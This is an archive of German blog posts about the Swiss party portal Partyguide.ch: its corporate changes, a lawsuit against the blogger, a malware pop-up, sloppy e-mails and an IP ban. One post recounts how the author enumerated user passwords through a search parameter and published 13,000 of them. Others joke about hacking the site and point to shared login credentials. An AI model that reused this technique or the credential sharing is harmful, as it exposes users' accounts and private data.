Donnerstag, Oktober 30, 2008
Party-Communities bald alle mit Namenssuche?
So komisch es vor einigen Jahren klang: Doch heute scheint sich der Web-Benutzer daran gewöhnt zu haben, mit dem realen Namen im Web aufzutreten. Aus dieser Warte erscheint die Identifikation der Benutzer mit Nicknames und die Unmöglichkeit, Personen mit ihrem richtigen Namen zu suchen, als zunehmend grosses Manko von Tilllate & Co.
Quelle: think eMeidi: Tilllate enttäuscht mit Redesign
Eine erste schweizerische Community wagt den Schritt:
NEU: Erweiterte Suchfunktion auf PartyGuide.ch
Dank: Mättu
Labels: Partyguide, Web
Dienstag, April 15, 2008
kann vom büro nicht auf partyguide
Liebe lernende UBS-Kauffrau, lieber lernender UBS-Kaufmann: Es gibt halt einfach Web-Sites, die du auf der Arbeit nicht ansurfen sollst! Vor allem, wenn deine Bank derart in den Miesen steckt ...
Vergesst nicht: Hätte es zu Marcel Ospels Stifti-Zeiten das Internet und Party-Portale gegeben, hätte er es garantiert nur zum Back-Office-Mitarbeiter dritten Ranges geschafft. Euer aller Idol wäre nicht dort, wo es heute ist - steinreich, arbeitslos, wohnhaft in einer angemessenen Villa in einem typisch schweizerischen Steuerparadies.
Erläuterung
Ich habe mir einen Spass daraus gemacht, Zugriffe von Proxy-Servern schweizerischer Unternehmen auf mein Blog speziell hervorzuheben (natürlich nur zum internen Gebrauch).
Unter anderem fand ich heute obigen Eintrag in meinem proprietären Analyse-Tool vor. Der Besucher hinter dem UBS-Proxy wurde mit einer Google-Suche "kann vom büro nicht auf partyguide" (gekennzeichnet mit "[G]" im Referer) auf mein Blog aufmerksam ...
Labels: Finanzen, Funny, Partyguide, Schweiz, UBS, Wirtschaft
Samstag, März 29, 2008
Partyguide wird zur Aktiengesellschaft
Hossa, da tut sich was im Lande:
Mutationen
PartyGuide.ch GmbH, in Hünenberg, CH-400.4.025.924-2, Gesellschaft mit beschränkter Haftung (SHAB Nr. 37 vom 22.02.2007, S. 19, Publ 3789834).
Statuten neu: 27.02.2008.
Rechtsform neu: Aktiengesellschaft.
Umwandlung: Die Gesellschaft mit beschränkter Haftung hat vorgängig ihr Stammkapital von CHF 20'000.00 auf CHF 100'000.00 erhöht und wird gemäss Umwandlungsplan vom 27.02.2008 und Bilanz per 31.12.2007 mit Aktiven von CHF 512'617.82 und Passiven (Fremdkapital) von CHF 288'037.17 in eine Aktiengesellschaft umgewandelt. Der einzige Gesellschafter [Jason Fellmann, Anm. think eMeidi] erhält für seinen bisherigen Stammanteil 850 Vorzugs-Namenaktien zu CHF 100.00 sowie 150 Namenaktien zu CHF 100.00.
Firma neu: PartyGuide.ch AG.
[...] Gemäss Erklärung des Verwaltungsrates vom 27.02.2008 untersteht die Gesellschaft keiner ordentlichen Revision und verzichtet auf die eingeschränkte Revision.
[...] Eingetragene Personen neu oder mutierend: Fellmann, Jason, von Zürich, in Merenschwand, Mitglied des Verwaltungsrates, mit Einzelunterschrift (bisher: Gesellschafter mit Einzelunterschrift und Geschäftsführer mit Einzelunterschrift und mit einem Stammanteil von CHF 20'000.00).
Quelle: SHAB, Nr. 50, 12. März 2008,
Lebensmittelpunkt
Der Leser sei darauf hingewiesen, dass Jason Fellmann in Merenschwand (AG) wohnt, (gemäss den letzten mir verfügbaren Informationen) mitten in der Stadt Zürich arbeitet, der Briefkasten der Aktiengesellschaft in Hünenberg (ZG) steht und deren Server irgendwo in der Stadt Zürich untergebracht sind - wo genau, erfährt man nicht so genau:
The data centers are located few walking minutes away from our office. For security reasons the addresses are not made public. It is most convenient to visit our office and we will then show you the way to the data centers.
Quelle: Directions to nine.ch
Beweggründe unbekannt
Wieso wird die Hobby-Bude in eine AG umgewandelt? Wieso profitiert nur Jason vom Aktiensegen, obwohl noch weitere sechs Personen auf Partyguides Lohnliste stehen? Steht vielleicht gar der IPO kurz bevor? Oder liegen konkrete Übernahmeangebote vor? Oder handelt es sich nur um ein Vehikel zur "Steueroptimierung"? Wir werden sehen ...
Labels: Partyguide
Samstag, Februar 16, 2008
Verbreitet Partyguide Malware?
Am 13. Februar wurde ich von zwei Bekannten darauf hingewiesen, dass kurz nach dem Besuch der Homepage von Partyguide mit dem Internet Explorer ein nerviges Pop-Up erschien (s. Bild).
Indem der Benutzer auf Abbrechen klickt, erscheint das Pop-Up immer und immer wieder. Nach einigen Klickversuchen liess das Tool einem dann gar keine Wahl mehr:
DiskRetter wird jetzt ihre Festplatte scannen
Der eine Kollege vermutete daraufhin, dass dies wohl eine Revanche der Betreiber sei, wenn jemand mit einem Referer à la blog.emeidi.com oder pgwatch.wordpress.com auf Partyguide gelangt ...
Über DiskRetter
Eine Google-Suche liefert knapp 7'000 Treffer zu diskretter:
Folgender Bericht im Winboard-Forum scheint sich mit den Erfahrungen meiner Kollegen zu decken:
Ich habe eben mit Firefox 2.0.0.6 gesurft, habe ein neues Tab geöffnet und wollte mich bei kwick. anmelden, [...] aber plötzlich verschwindet mein Firefox-Fenster. In der Task-Leiste steht nur noch ein Icon vom Firefox und dahinter "Error Detectet - Mozilla Firefox" dafür aber erscheint Rechts untern ein Fenster (wie bei Fehlermeldungen). Siehe Screenshoot!!!
Quelle: diskretter.com
Mundtot machen
Bei mir kann ein solches Pop-Up gar nicht erst auftreten, da ich die Domain
phpads.partyguide.ch
seit Jahr und Tag in meinem DNS geblacklistet habe.
Dank: Mäxu & Bäschtu
Labels: Partyguide, Sicherheit, Viren, Web
Mittwoch, Januar 23, 2008
Nächster Partyguide-Gerichtstermin
Wichtiger Hinweis
Der anberaumte Termin wurde verschoben. Sobald der neue Termin bekannt ist, wird er in einem neuen Artikel auf meinem Blog publiziert.Mario Aeby, 18. Februar 2008
Eigentlich wurde mir im August 2007 ja die nächste Verhandlung noch vor Jahresende versprochen, doch aus unbekannten Gründen findet die nächste Verhandlungsrunde nun erst mehr als sechs Monate nach dem ersten Termin statt:
Dienstag, 4. März 2008, 15:30 Uhr
Jason Felmann lässt sich dieses Mal nicht mehr von seinem Techniker Oliver Walzer vertreten (ein Schritt, der aus juristischer Sicht fragwürdig war), sondern hat einen Anwalt namens "M. Meier" engagiert.
Labels: Jura, Partyguide
Mittwoch, Dezember 05, 2007
Studienthema Partyguide
Wer morgen nichts los hat und per Zufall in Lozääärn weilen sollte, sei folgende Veranstaltung empfohlen:
Virtuelle Identitäten
Luzerner Studierendenkonferenz
...
13.00 bis 14.30 Uhr
Vorträge, Moderation und Diskussion von Studierenden für Studierende zu den Themen:
- Wie verändert sich die Identitätsbildung im Internet
- Soziale Beziehungen in Online-Rollenspielen
- Virtuelle Freiezeit?! Eine Analyse von Partyguide.ch
Quelle: Luzerner Studierendenkonferenz
Dank: Kure
Stellt der Autor die Slides ins Netz? Nimmt den Vortrag jemand mit der Videokamera auf und lädt das Video dann auf YouTube? Wäre cool.
Labels: Partyguide
Montag, November 19, 2007
Party-Sites auf dem Weg zur eierlegenden Wollmilchsau
Ab sofort bieten wir Dir einen neuen Service. In Zusammenarbeit mit jobs.ch haben wir auf unserer Website einen Stellenmarkt integriert. Somit hast Du neu die Möglichkeit, im grössten Schweizer Online – Stellenmarkt, täglich von über 25000 Jobs, den Richtigen zu finden. Oder noch attraktiver, lass Dich finden! Hinterlege jetzt anonym Deine Karrieredaten auf der führenden Job-Plattform. Über 5200 angeschlossene Firmen und Headhunter nutzen den Pool laufend für die Besetzung von Top-Positionen.
Wann kann ich wohl meine Kaffee-Maschine über Partyguide & Co. fernsteuern?
Mir wäre als Arbeitgeber schleierhaft, weshalb ich ausgerechnet Personal rekrutieren soll, deren Freizeit- (und Arbeitsbeschäftigung) das Surfen auf Party-Sites ist ...
Labels: Partyguide, Schweiz, Web, Werbung
Freitag, November 16, 2007
Partyguide beliefert Google Maps Schweiz
Google hat maps.google.ch lanciert. Benutzer können damit nicht nur jedes Geschäft und jedes Dienstleistungsangebot in ihrer Nähe finden sondern auch alle Clubs und deren Veranstaltungen, welche PartyGuide.ch als Contentpartner liefert.
Quelle: Clubs & Veranstaltungen neu auf Google Maps Schweiz
Mir bleibt die Spucke weg!
Technik
Mich würde die im Einsatz befindliche Technik brennend interessieren - Web-Services mit XML? Kann Partyguide sowas überhaupt? Oder schicken die Argonauten zu Beginn einer jeden Woche .xls-Files auf einer Floppy-Disk zum Hürlimann-Areal?
Ich muss mal mit Insidern Kontakt aufnehmen ...
Schläft die Konkurrenz?
Und wo bleiben Tilllate und Lautundspitz? Aber es gibt ja noch local.ch sowie map.search.ch, um ertragsreiche Ehen einzugehen ...
Dank: Lulu
Labels: Google, Partyguide
Dienstag, November 13, 2007
Partyguide Konto-Reaktivierung: Einmal 500 Stutz bitte
die wiederherstellung eines definitiv gelöschten accounts würde rund 500.- kosten. wenn du diese kosten übernimmst, kannst du anschließend eine übertragung der premium oder basic credits selber vornehmen. eine andere möglichkeit gibt es leider nicht.
gemäss AGB können wir dir das geld leider auch nicht rückerstatten.
Quelle: Mail von Steven B. an T. vom 12. September 2007
T. hatte den Fehler gemacht, im August seinen Partyguide-Account zu löschen, obwohl er wenige Tage zuvor für eine stattliche Summe auf einen Premium-Account gewechselt hatte (T.s kurzsichtiges Denken verwundert ein wenig - aber egal).
Selbstverständlich verstehe ich die Leute hinter Partyguide, wenn sie nicht täglich dutzende gelöschte Accounts reaktivieren möchten, weil es sich die Teenies im Wechselbad hormoneller Schübe anders überlegt haben. Da aber T. - nicht wie viele andere Benutzer - vorgängig zur Löschung Geld an Partyguide überwiesen hatte, hätte man wohl etwas kulanter mit der Bitte umgehen sollen.
Zwei mögliche Erklärungsversuche:
- Das Wiederherstellen von einzelnen Datensätzen aus dem Datenbank-Backup gestaltet sich als äusserst schwierig, wenn nicht gar unmöglich. Dies ist dann der Fall, wenn bei der Löschung eines Accounts alle Spuren des Benutzers aus der Datenbank verschwinden, was aus datenschutzrechtlichen Gründen wohl die einzig richtige Vorgehensweise ist.
- Die Argonauten waren schlicht zu faul, ihr "Füdle" zu lüpfen und setzten den Betrag Handgelenk-mal-Pi derart hoch, dass kein rationaler Mensch ("Homo oeconomicus") jemals die Reaktivierung seines Premium-Accounts fordern würde.
Auch T.s Vorschlag, die nachprüfbar gekauften Premium-Features (eine Buchhaltung sollte es auch bei Partyguide geben) auf neu zu erstellendes Konto zu übertragen, wurde abgelehnt.
PS: Peter Vogel, Steven B. - macht ihr die Support-Arbeit für Jason eigentlich gegen Entgelt?
Labels: Partyguide
Dienstag, November 13, 2007
Partyguide Fact-Sheet
Es ist wieder einmal an der Zeit, mich zum leidigen Thema Partyguide zu Wort zu melden. In letzter Zeit war es hier auf meinem Blog verdächtig ruhig zu dem Thema. Keine Angst, niemand hat mir einen Maulkorb verpasst, und auch die Gerichts-Posse hat (bisher) noch keine Fortsetzung gefunden.
Dank Trackbacks bin ich soeben auf einen Artikel des Sicherheitsexperten Damian "Yanux" Kaufmann (Mr. XSS-und-unfiltered-HTML höchstpersönlich) aufmerksam geworden, der von der Blogosphäre1 über Partyguide zusammengetragene Erkenntnisse zu einem trockenen, aber äusserst neutralen Artikel zusammengefasst hat.
Der Leser wird nicht viele Neuigkeiten zum Thema entdecken - schön aber, dass sich beispielsweise endlich jemand die Mühe gemacht hat, alle Partyguide-Server aufzuzählen:
PartyGuide.ch GmbH - Die Geschichte ohne Ende…
Willkommen in der Blogosphäre, Damian!
1) Ausführlich mit (sicherheits-)technischen Aspekten der Web-Site von Partyguide beschäftigt sich diese Wenigkeit von Blog, über die optische Aufmachung hat Ale das eine oder andere deftige (Bern-)deutsche Wort verloren.
Labels: Partyguide
Dienstag, Oktober 16, 2007
Partyguide versendet unkonforme Mails
Gestern Abend kam ich aus einem mir unerklärlichen Grund auf die Idee, den Quellcode eines von Partyguide automatisch versandten Mails unter die Lupe zu nehmen (in Apple Mail: Apfel + Alt + U):
Return-Path: <partyguide@partyguide.ch> Received: from all01.mx.genotec.ch (unknown [IPv6:2001:1b50::82:195:224:51]) by gmc-pop-bsd-014.genotec.ch (Postfix) with ESMTP id 94C481739A51 for <spam@emeidi.com>; Tue, 16 Oct 2007 00:34:09 +0200 (CEST) Received: from partyguide.ch (defiant.partyguide.ch [217.150.245.69]) by all01.mx.genotec.ch (Postfix) with ESMTP id C634B558B8E for <spam@eMeidi.com>; Tue, 16 Oct 2007 00:31:23 +0200 (CEST) Received: (qmail 3397 invoked from network); 15 Oct 2007 22:33:57 -0000 Received: from unknown (HELO nebula.partyguide.ch) (192.168.0.13) by defiant.partyguide.ch with SMTP; 15 Oct 2007 22:33:57 -0000 Received: by nebula.partyguide.ch (Postfix, from userid 507) id 238C850D831; Tue, 16 Oct 2007 00:33:57 +0200 (CEST) To: spam@eMeidi.com Subject: ******* hat heute Geburtstag! From: noreply@partyguide.ch<noreply@partyguide.ch> X-Mailer: PHP/5.2.3 X-Sender-IP: Content-Type: text/html Message-Id: <20071015223357.238C850D831@nebula.partyguide.ch> Date: Tue, 16 Oct 2007 00:33:57 +0200 (CEST) X-GIC-MailScanner-SpamCheck: not spam, SpamAssassin (not cached, score=-0.045, required 10, BAYES_00 -2.60, FORGED_RCVD_HELO 0.14, HTML_30_40 0.37, HTML_MESSAGE 0.00, HTML_MIME_NO_HTML_TAG 1.08, MIME_HEADER_CTYPE_ONLY 0.00, MIME_HTML_ONLY 0.00, NO_REAL_NAME 0.96) <font face="verdana" size="2">Hallo mad4you! <br><br> Dein PartyGuide.ch myFriend ******* hat heute Geburtstag!<br> Vergiss nicht zu gratulieren :-) <br><br> Hier gehts zum Profil von *******:<br> <b><a href="http://my.PartyGuide.ch/*******">http://my.PartyGuide.ch/*******</a></b> <br><br> Dies ist ein automatisch generiertes eMail... <br><br> Liebe Grüsse<br> PartyGuide.ch Team </font>
Einige Bemerkungen:
- Fangen wir mit der einzigen vorbildlichen Eigenschaft des Mails an: Return-Path ist gesetzt. Tritt beim Versand des Mails ein technisches Problem auf, kriegt dies Partyguide über die Adresse partyguide@partyguide.ch mit.
Würde man diese Adresse als Absender einsetzen, würden wohl täglich unzählige unerwünschte Antworten von Endbenutzern auf die erwähnte Adresse eintrudeln, die gedankenlos den Antworten-Knopf drücken. Deshalb noreply@partyguide.ch im From:-Feld. - Irgendwie sieht aber genau dieses From-Feld nicht ganz koscher aus: From: noreply@partyguide.ch<noreply@partyguide.ch> Sollte da nicht noch ein Abstand zwischen dem anzuzeigenden Namen und dem < zu stehen kommen? Da die Information aber sowieso redundant ist, sollte man den Namen einfach weglassen und nur <noreply@partyguide.ch> schreiben ...
- Wo bleibt der html und der body-Tag (inkl. End-Tags)?! Wenn das Mail als Content-Type: text/html versandt wird, sollte es auch den minimalsten Anforderungen des HTML-Standards genügen. Der Entwickler hat - wieder einmal - geschlampt. Nebenbei: Wieso muss für einen solchen Text überhaupt ein HTML-Mail versandt werden? Nur damit die URL fett eingefärbt werden kann?
Man beachte X-GIC-MailScanner-SpamCheck (SpamAssassin), der sich auch über die fehlenden Tags beschwert (HTML_MIME_NO_HTML_TAG) und dafür satte 1.08 Spam-Punkte vergibt - X-Mailer: PHP/5.2.3 - wieso um Gottes willen greift man nicht auf OSS-Klassen wie den ausgereiften (und von Profis programmierten) PHPMailer zurück, die das Versenden von HTML-Mails mit alternativem Plain-Text-Body und Attachment zum Klacks machen?
- Immerhin verwendet man nicht mehr PHP 3.x, sondern 5.2.3. Der erste Schritt in die Absicherung der Plattform ist somit getan. Nun kommt aber noch der deutlich grössere Teil der Arbeit: Der Code-Audit und damit einhergehend neu schreiben von mehrere Jahre altem Spaghetti-Code ...
Ein zufälliger Blick in ein Nebenprodukt von Partyguide - und man wird sich wieder einmal bewusst, wie gering die Ambitionen der Programmierer sind (waren?), standardkonformen und sauberen Code vorzulegen. Aus meiner Sicht ein klassisches Beispiel von "Internet-Frevel" und symptomatisch für das Portal. Nur weil ein Script funktioniert und auf dem Internet Explorer und in Microsoft Outlook anständig gerendert wird, heisst das noch lange nicht, dass der Code auch professionellen Anforderungen standhält.
Jason und Argonauten: Das ist eure Visitenkarte, die euer "Unternehmen" Techies unter die Nase hält - kein Wunder, hat sich Tamedia für die Zusammenarbeit mit dem geringsten aller Übel, Tilllate, entschieden ...
Labels: IT, Partyguide, Sicherheit, Web
Freitag, Oktober 05, 2007
Partyguide: Volkssport gefälschte Benutzerprofile
Hmmm, da fragt man sich doch: Welche ist nun die richtige Melanie?
Bei der Kindergarten-Community Partyguide gibt es immer wieder Spassvögel, die sich mit gefälschten Angaben ein Konto eröffnen. Ganz dreist wird es aber, wenn die hinterlistigen Benutzer nicht nur Profile eröffnen, sondern auch noch gleich Bilder von anderen Partyguide-Benutzern stibitzen.
Ab und zu stolpert man auf Profilseiten auf Kommentare, wo ein User einen anderen anfährt, wieso er sein Bild in seinem Profil verwendet.
Dieses Mal hat es das Foto meiner Freundin getroffen. Mal schauen, wie lang es geht, bis "Celine Ingolds" Account gelöscht wurde.
Lieber Oli (an den Rest der Argonauten-Truppe wende ich mich gar nicht mehr, da man lieber Banknoten zählt als die Plattform voranbringt), wann endlich wird die Verifizierung per SMS Pflicht? So kann es doch einfach nicht weitergehen!
Labels: Blogosphäre, Melanie, Partyguide
Samstag, September 15, 2007
Ajax-Klicks und das WEMF-Rating
Bei einem anderen Einsatzgebiet ist Ajax aber kritischer, und zwar dann, wenn auf einen Mausklick des Benutzers reagiert werden soll, und Ajax hilft, nur den Teil neu zu laden, welcher den gewünschten Inhalt darstellt. In diesem Fall darf laut gültigen WEMF-Regeln kein WEMF-Klick ausgelöst werden, d.h. kurz gesagt, um so mehr Ajax wir in diesem Bereich einsetzen würden, um so geringer würden unsere ausgewiesen WEMF Pageimpressions werden und damit die Pageimpressions gar nicht mehr die tatsächlichen Klicks unserer Besucher widerspiegeln.
Einfach ausgedrückt, umso komplizierter eine Webseite, desto höher liegt sie in der WEMF Seitenstatistik.
Quelle: Lautundspitz goes Ajax
Könnte dies mit ein Grund sein, wieso Partyguide - eigentlich die besucherstärkste schweizer Party-Community - unangefochten an der Spitze der WEMF-Ratings für Party-Sites steht (August: Partyguide • Tilllate • Lautundspitz • Usgang) - aber dennoch nicht von Tamedia aufgekauft wurde?
Labels: Partyguide
Donnerstag, September 13, 2007
Bewegung in der Party-Portal-Szene
Zuerst erfahre ich, dass Partyguide seit kurzem bloggt, und nun das:
Das Medienunternehmen Tamedia baut seine Online-Aktivitäten weiter aus und beteiligt sich an der Schweizer Nightlife-Plattform tilllate.com.
Quelle: Tamedia beteiligt sich an tilllate AG
Gratulation an Silvan & Co. zu der Anerkennung ihrer Leistung. Da bleibt eigentlich nur die Frage, wieso Tamedia nicht in das "meistbesuchte" Party-Portal investiert hat? Weiss ein Insider mehr?
Nummer 4
Wenn ein anderer, anonym bleibender Informant recht hat, tut sich in der Branche in letzter Zeit viel:
Anderes Gerücht [...] scheint die Usgang.ch GmbH an den Axel Springer Verlag verkauft worden zu sein. Natürlich nicht direkt, sondern über den Umweg Axel Springer -> Verlagsgruppe Handelszeitung -> Amiado AG -> Guestlist.ch GmbH -> Usgang.ch GmbH.
Da ich dieses Gerücht nur aus einer Quelle zugetragen bekommen habe, ist es mir unmöglich, die Behauptung zu bestätigen.
Labels: Party, Partyguide
Donnerstag, September 13, 2007
Partyguide bloggt!
- HTML: PartyGuide.ch Infos
- RSS2: Feed
Wie es sich für Partyguide gehört, ist die Kommentarfunktion (noch) deaktiviert. Könnte sich da mal jemand reinhacken und die Funktion aktivieren? *zwinker* Kommentare verfasst man, in dem man auf 0 Kommentare klickt. Die Ergüsse der Leser werden aber gegengelesen und erst dann freigeschaltet:
Achtung: Der Kommentar muß erst noch freigegeben werden.
Grundsätzlich aber begrüsse ich den Entscheid und hoffe, dass damit ein neues, fröhlicheres Kapitel in der Geschichte des meistbesuchten Party-Portals der Schweiz geschrieben wird.
Via: PG goes Wordpress?
Labels: Partyguide
Mittwoch, September 05, 2007
Promo-Team infiltriert Tilllate, Partyguide etc.
Ein Bekannter hat mir folgendes Mail zugespielt:
!..PROMOTER GESUCHT..! Hast du Lust auf einen kleinen Nebenjob? Wir von La Campania sind ein neues Promo-Team am zusammenstellen, weil wir jetzt Schweizweit in vielen verschiedenen Clubs der Schweiz arbeiten. Deine Aufgaben währen: Werbung in denn verschiednen Internetportalen wie Tilllate, Partyguide usw.. Deine Eigene Friendsliste zu erstellen Deine Vorteile: Für jeden Namen der von Deiner Friendsliste an die Party kommt, bekommst du 1.50 Fr. Und du hasst an jeder Party die von La Campania veranstaltet wird 2 Gratis Eintritte. Falls dich das interessiert melde Dich bei: m.********@gmx.ch
Ich glaube kaum, dass die Bürokratie zur Überprüfung der Namen auf der Friendsliste dem Anbieter einen Profit ermöglicht. Abgesehen davon: Mein ganz persönlicher Buch-Tipp.
Labels: Freizeit, Kunde, Party, Partyguide, Wirtschaft
Mittwoch, September 05, 2007
Zugangsdaten für registrierungspflichtige Web-Sites
Wer wie ich gerade einem Bekannten Zugang zu Partyguide-Profilen verschaffen muss, ohne dass er sich in einem langwierigen und pingeligen Prozess registriert (just kidding), sei folgende Web-Site empfohlen:
Labels: Partyguide, Sicherheit, Web
Samstag, September 01, 2007
Parallelen zum dritten Partyguide-Hack
Underscoring a major susceptibility threatening thousands of high-profile computer users across the world, a Swedish security consultant has published login credentials belonging to some 100 embassies.
Quelle: Mystery SNAFU exposes email logins for 100 foreign embassies (and counting)
Beim dritten Partyguide-Hack veröffentlichte ich 13'000 Passwörter von Benutzerkonten der Online-Community Partyguide. Zum Zeitpunkt der Veröffentlichung des Blog-Artikels (Samstag, 9. Juni 2006) waren die Passwörter der komprimittierten Accounts aber bereits von den Verantwortlichen zurückgesetzt worden.
"It will only take 10 minutes and every script kiddie is going to be using the exact same method," he told The Reg. "I'm probably not the first one grabbing these passwords, but I'm absolutely the first one publishing them."
Die Sicherheitslücke entdeckte ich während der Programmierung einer Suchfunktion für Partyguide-Benutzer (was bringt eine Suchfunktion, wenn man nicht auch gleich das Bild der gefundenen Benutzern präsentiert erhält). Nachdem ich beim Zugriff auf das AJAX-Such-Script auf Grund falsch formulierter GET-Parameter SQL-Errors zu Gesicht bekam, versuchte ich mich einer SQL-Injection. Leider führte dies zu keinem Erfolg. Umso erstaunter war ich, als ich der Suchabfrage einfach ein Parameter user_search.php?bla=bla...&password=123456 beifügte - und als Resultat alle Benutzer präsentiert erhielt, die dieses Passwort gesetzt hatten. Diese Lücke war selbst für Script-Kiddies schon fast zu einfach ...
Ob vor mir bereits jemand auf diese Lücke aufmerksam geworden ist und diese ausgenutzt hat, weiss ich nicht. Die Entwickler hinter Partyguide wohl auch nicht. Schliesslich wurden sie auf den Hack nur aufmerksam, weil ich während sieben Tagen zehntausende von Anfragen auf das Suchscript losfeuerte. Die Sicherheitslücke wurde nach der Entdeckung durch die Partyguide-Entwickler innert Stunden gefixt. Ich war der erste, der die Lücke öffentlich machte (Partyguide hat bis heute zu keiner der von mir veröffentlichten Sicherheitslücken und Datenlecks weder öffentlich Stellung genommen noch seine Benutzer informiert).
Egerstad's list offers a rare glimpse into the password robustness, or lack thereof, of various countries. At the top of the list was Uzbekistan, where a typical password looks something like "s1e7u0l7c." Surprisingly, the ultra-secret Iran was near the bottom of the list; passwords for its various embassies tended to be the city or country in which the embassy resides. The Hong Kong Liberal Party used "12345678" while one for an Indian embassy was simply "1234."
Auch ich liess es mir im Nachgang zur Veröffentlichung der Lücke nicht nehmen, die Liste der Zugangsdaten nach häufigen Passwörtern zu durchforsten.
Egerstad's decision to publish the account details online is sure to reignite the frequent debate about whether such full disclosure is irresponsible because it simply allows a broader base of people to misuse the information. He says he's well versed in the merits of responsible disclosure but decided that posting the login details was the only way to get the attention this problem deserves.
"I don't have time calling all over the world to tell them something they won't understand or listen to," Egerstad said. "I'm probably going to get charged for helping to commit a crime. I don't really care."
Eine ähnliche Diskussion hat sich auch bei der Veröffentlichung meiner Erkenntnisse entfacht. Und auch ich forderte Partyguide auf, ein Gericht über die Illegalität meiner Handlungen entscheiden zu lassen. Nun, Letzteres bahnt sich mittlerweile an.
Nachtrag: "Millionenraub" auch bei Monster.com
[...] As is the case with many companies that maintain large databases of information, Monster is from time to time subject to attempts to illegally extract information from its database.
As you may be aware, the Monster resume database was recently the target of malicious activity that involved the illegal downloading of information such as names, addresses, phone numbers, and email addresses for some of our job seekers with resumes posted on Monster sites.
The Company has determined that this incident is not the first time Monster's database has been the target of criminal activity. [...] While no company can completely prevent unauthorized access to data, [...]
Quelle: Security Notice
Labels: Partyguide, Sicherheit, Web
Mittwoch, August 29, 2007
Partyguide Nutzerzahlen 2006
Ist etwas dran an der Forderung von Partyguide? Definitiv beurteilen kann ich beim derzeitigen Stand der Dinge nicht.
Interessant ist sicherlich aber das von mir aus WEMF-Daten generierte Diagramm. Es zeigt einen deutlichen Einbruch in der Zahl der Visits und Page Impressions im Monat Juli 2006, um im August 2006 dann alle vorangegangenen Monate zu überflügeln.
Kurzsichtig argumentiert könnte man diesen "Benutzerschwund" auf die Veröffentlichung meiner Hack-Gschichtli in meinem Blog zurückführen. Doch Sinn macht das kaum - erst im August erschienen die Medienberichte in heute und der BernerZeitung, die die Kunde definitiv an den letzten Hinterwäldler verbreitete.
Bad News are Good News?
Könnte es also gar sein, dass die Medienpräsenz Partyguide nicht etwa geschadet, sondern zu mehr Zugriffen verholen hat? Das wird man wohl nie genau eruieren können.
Dier Erklärung
Was den Juli anbelangt: Das Zielpublikum von Partyguide wird sich in diesem Monat wohl einfach wie der Rest der Schweiz auf in die Ferien gemacht haben. Jedenfalls zeigen die Zahlen von 2007 einen identischen Verlauf (auf höherem Niveau), ohne dass ich in diesem Sommer irgendein Datenleck hätte explodieren lassen ...
Entscheidend: Werbegelder
Das A und O der Beweisführung des Zivilklägers wird aber sein, den Einbruch bei den Werbebuchungen geltend zu machen. Wie auch immer die Analyse ausfallen wird: Ich freue mich schon jetzt, endlich einmal einen Einblick in die während den betreffenden Monaten erwirtschaftete Summe an Werbegelder zu nehmen. Ob ausser Jason schon jemals jemanden der Blick in die Buchhaltung erlaubt wurde? Nun, vielleicht wirft ja Marcel (Jasons Pappi) dann und wann einen Blick in die Excel-Zahlenkolonnen.
Labels: Partyguide
Montag, August 20, 2007
Partyguide will Geld von Blogger
Heute war es wieder einmal so weit - die wohl nie mehr enden wollende Story Partyguide v. think eMeidi scheint ein berichtenswertes Ereignis zu sein und wurde in der Abendzeitung heute vom 20. August 2007 (S. 27) kurz angerissen.
Wer von der ganzen Angelegenheit noch nichts mitbekommen hat, hier das wichtigste in Kürze:
Die Hacks
- Der Partyguide-Hack
- Der dritte Partyguide-Hack
- Der vierte Partyguide-Hack
- Der fünfte Partyguide-Hack
Die fragwürdigen Reaktionen von Partyguide
- Partyguide zensiert eMeidi
- Partyguide Strikes Back
- Partyguide schreibt meinem Arbeitgeber einen Brief
- Gerichtsvorladung: Partyguide v. think eMeidi
- Partyguide um 20'000 SFr. geschädigt
- Partyguide auf 20 Minutens Spuren (Hier konnte ich mich mit dem CTO auf einen Kompromiss einigen. Danke, Oli!)
Kritik, die auf taube Ohren stiess
- Effiziente Web-Projekte anhand von Partyguide, Teil 1
- Effiziente Web-Projekte anhand von Partyguide, Teil 2
- Partyguide definitely sucks
- Partyguide: Nichts gelernt ...
Wer an wirklich jedem je von mir geschriebenen Partyguide-Artikel interessiert ist, schaue hier vorbei:
Ferner ...
Dank einem aufmerksamen Leser der Partyguide-AGBs muss ich dieses Schmankerl einfach noch erwähnen:
Benutzeraccounts
Du darfst maximal 3 Benutzeraccounts eröffnen. Alle Benutzeraccounts müssen korrekte Angaben enthalten und dürfen die nachfolgenden Verhaltensregeln und AGBs nicht verletzen.
Dann sollte ich wohl schleunigst meine zwei zusätzlichen Accounts beantragen *zwinker*
Labels: Partyguide
Sonntag, August 19, 2007
Partyguide auf 20 Minutens Spuren
(Sorry, wenn ich meine Leser mit übermässig vielen Partyguide-Nachrichten belästige, aber diese eine sei mir für die nächsten Tage/Wochen noch gegönnt).
Seit letzten Freitag, etwas nach 12 Uhr, ist es mir nicht mehr möglich, auf www.partyguide.ch zuzugreifen. Zuerst dachte ich an ein generelles Problem, als die 404er-Seite (s. oben rechts) angezeigt wurde (gibt es dort ja hin und wieder). Als das vermeintliche Problem nach mehreren Stunden immer noch nicht gelöst war, kamen mir erste Zweifel.
Ein Test mit anderen Internet-Nutzern ergab, dass nur ich die 404er zu sehen bekam.
Ist der Partyguide CTO virtuell Amok gelaufen? Es scheint so. Wieso sperrt man nicht einfach meinen Account, sondern verwehrt mir gleich ganz den Zugriff auf die Web-Site?
Die Antwort auf diese Frage ist nach etwas Hirnanstrengung ganz einfach: Gibt es ein effektiveres Mittel, als mögliche Sicherheitsüberprüfungen eines unangenehmen Zeitgenossen zu verhindern, als seine IP zu sperren und jegliche Zugriffe auf die undichte Web-Site abzuwehren?
Ich befürchte, dass man so den dringend nötigen Security-Audit aufschiebt. Wer weiss, wer die von mir benutzten Lücken lange vor mir unbemerkt zu seinen Gunsten ausgenutzt hat? Wer weiss, wie viele ungepatchte Löcher es derzeit im Frickel-Code von Partyguide hat?
Kollateralschaden
Einen Haken hat die Sache allerdings: Ich bin Cablecom Hispeed-Kunde mit einer dynamischen IP. Sobald mir demnächst eine neue IP-Adresse zugewiesen wird, muss auch die Partyguide-Konfiguration angepasst werden. Oder aber ein unschuldiger Internetbenutzer wird nicht mehr auf die meistbesuchteste Party-Web-Site der Schweiz zugreifen können ...
Technisches
Die einfachste Lösung zum Blockieren einer bestimmten IP-Adresse ist unter Apache wohl mod_rewrite:
RewriteEngine On
RewriteCond %{REMOTE_ADDR} ^84.75.197.247$
RewriteRule ^.*$ - [R=404]
Man hätte es auch mit .htaccess machen können, dann würde mir aber (meines Wissens) ein 403er und nicht ein 404er präsentiert:
order allow,deny deny from 84.75.197.247 allow from all
Parallelen?
